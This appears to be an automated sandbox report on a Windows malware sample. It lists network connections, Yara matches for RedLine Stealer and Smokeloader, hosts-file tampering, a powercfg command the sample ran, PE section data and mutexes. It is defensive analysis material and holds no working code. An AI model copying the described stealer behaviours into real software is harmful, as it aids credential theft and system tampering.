                    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 87.106.236.48:443 -> 192.168.2.4:49761 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.4:49763 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49765 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.4:49767 version: TLS 1.2

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Modifies the hosts file
                    Source: C:\ProgramData\GDBFCGIIIJ.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,0_2_00409E30

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000000.00000002.2313485622.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    PE file contains section with special chars
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Uses powercfg.exe to modify the power settings
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C8162C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,0_2_6C8162C0
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C69AC600_2_6C69AC60
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C76AC300_2_6C76AC30
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C756C000_2_6C756C00
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C68ECC00_2_6C68ECC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6EECD00_2_6C6EECD0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C75ED700_2_6C75ED70
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7BAD500_2_6C7BAD50
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C81CDC00_2_6C81CDC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C818D200_2_6C818D20
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C694DB00_2_6C694DB0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C726D900_2_6C726D90
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C72EE700_2_6C72EE70
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C770E200_2_6C770E20
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C69AEC00_2_6C69AEC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C730EC00_2_6C730EC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C716E900_2_6C716E90
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C752F700_2_6C752F70
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6FEF400_2_6C6FEF40
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7D0F200_2_6C7D0F20
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C696F100_2_6C696F10
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C76EFF00_2_6C76EFF0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C690FE00_2_6C690FE0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7D8FB00_2_6C7D8FB0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C69EFB00_2_6C69EFB0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7648400_2_6C764840
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6E08200_2_6C6E0820
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C71A8200_2_6C71A820
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7968E00_2_6C7968E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6C89600_2_6C6C8960
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6E69000_2_6C6E6900
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7AC9E00_2_6C7AC9E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6C49F00_2_6C6C49F0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7509B00_2_6C7509B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7209A00_2_6C7209A0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C74A9A00_2_6C74A9A0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C70CA700_2_6C70CA70
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C748A300_2_6C748A30
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C73EA000_2_6C73EA00
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C70EA800_2_6C70EA80
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C796BE00_2_6C796BE0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C730BA00_2_6C730BA0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6A84600_2_6C6A8460
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C71A4300_2_6C71A430
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F44200_2_6C6F4420
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C72A4D00_2_6C72A4D0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6D64D00_2_6C6D64D0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7BA4800_2_6C7BA480
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7305700_2_6C730570
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F25600_2_6C6F2560
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7D85500_2_6C7D8550
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6E85400_2_6C6E8540
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7945400_2_6C794540
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C71E5F00_2_6C71E5F0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C75A5E00_2_6C75A5E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6845B00_2_6C6845B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6EC6500_2_6C6EC650
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6EE6E00_2_6C6EE6E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C72E6E00_2_6C72E6E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6B46D00_2_6C6B46D0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7107000_2_6C710700
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6BA7D00_2_6C6BA7D0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6DE0700_2_6C6DE070
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7580100_2_6C758010
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C75C0000_2_6C75C000
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C76C0B00_2_6C76C0B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6A00B00_2_6C6A00B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6880900_2_6C688090
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F81400_2_6C6F8140
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7061300_2_6C706130
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7741300_2_6C774130
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6901E00_2_6C6901E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7182600_2_6C718260
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7282500_2_6C728250
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C8162C00_2_6C8162C0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7682200_2_6C768220
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C75A2100_2_6C75A210
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C75E2B00_2_6C75E2B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7622A00_2_6C7622A0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7263700_2_6C726370
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7D23700_2_6C7D2370
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6923700_2_6C692370
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7AC3600_2_6C7AC360
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6983400_2_6C698340
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7023200_2_6C702320
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6E43E00_2_6C6E43E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6C23A00_2_6C6C23A0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6EE3B00_2_6C6EE3B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C693C400_2_6C693C40
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7B9C400_2_6C7B9C40
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6A1C300_2_6C6A1C30
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C751CE00_2_6C751CE0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7CDCD00_2_6C7CDCD0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C72FC800_2_6C72FC80
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F3D000_2_6C6F3D00
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C761DC00_2_6C761DC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C683D800_2_6C683D80
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7D9D900_2_6C7D9D90
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7EBE700_2_6C7EBE70
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C79DE100_2_6C79DE10
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6B3EC00_2_6C6B3EC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C815E600_2_6C815E60
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C813FC00_2_6C813FC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6C5F200_2_6C6C5F20
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C685F300_2_6C685F30
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7E7F200_2_6C7E7F20
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C73BFF00_2_6C73BFF0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7ADFC00_2_6C7ADFC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6B1F900_2_6C6B1F90
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6ED8100_2_6C6ED810
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C76F8F00_2_6C76F8F0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C69D8E00_2_6C69D8E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6C38E00_2_6C6C38E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7EB8F00_2_6C7EB8F0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C72F8C00_2_6C72F8C0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C70F9600_2_6C70F960
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C74D9600_2_6C74D960
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7459200_2_6C745920
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7DF9000_2_6C7DF900
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7279F00_2_6C7279F0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F59F00_2_6C6F59F0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7299C00_2_6C7299C0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6C99D00_2_6C6C99D0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: String function: 6C6B3620 appears 74 times
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: String function: 6C7C9F30 appears 32 times
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: String function: 6C81D930 appears 50 times
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: String function: 00404610 appears 317 times
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: String function: 6C6B9B10 appears 86 times
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: String function: 6C6EC5E0 appears 35 times
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: String function: 6C81DAE0 appears 62 times
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: String function: 6C8109D0 appears 272 times
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7308 -ip 7308
                    Source: chrome_131[1].exe.0.drStatic PE information: Number of sections : 14 > 10
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: Number of sections : 14 > 10
                    Source: updater.exe.9.drStatic PE information: Number of sections : 14 > 10
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2331753132.0000000028A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs WGo3ga1AL9.exe
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs WGo3ga1AL9.exe
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2333204308.000000006F902000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs WGo3ga1AL9.exe
                    Source: WGo3ga1AL9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2313485622.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: WGo3ga1AL9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: Section: ZLIB complexity 0.9913165758481279
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: Section: ZLIB complexity 1.0022348638764729
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: Section: ZLIB complexity 1.0413533834586466
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: Section: ZLIB complexity 1.5625
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: Section: ZLIB complexity 2.3333333333333335
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: Section: ZLIB complexity 1.030054644808743
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: Section: ZLIB complexity 1.1047619047619048
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.5
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9913165758481279
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.0022348638764729
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.0413533834586466
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.5625
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 2.3333333333333335
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.030054644808743
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.1047619047619048
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.5
                    Source: updater.exe.9.drStatic PE information: Section: ZLIB complexity 0.9913165758481279
                    Source: updater.exe.9.drStatic PE information: Section: ZLIB complexity 1.0022348638764729
                    Source: updater.exe.9.drStatic PE information: Section: ZLIB complexity 1.0413533834586466
                    Source: updater.exe.9.drStatic PE information: Section: ZLIB complexity 1.5625
                    Source: updater.exe.9.drStatic PE information: Section: ZLIB complexity 2.3333333333333335
                    Source: updater.exe.9.drStatic PE information: Section: ZLIB complexity 1.030054644808743
                    Source: updater.exe.9.drStatic PE information: Section: ZLIB complexity 1.1047619047619048
                    Source: updater.exe.9.drStatic PE information: Section: .reloc ZLIB complexity 1.5
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@78/58@7/8
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,0_2_6C6F0300
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00418810
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413970
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\47IGIF3F.htmJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7308
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrw1ekzs.ysi.ps1Jump to behavior
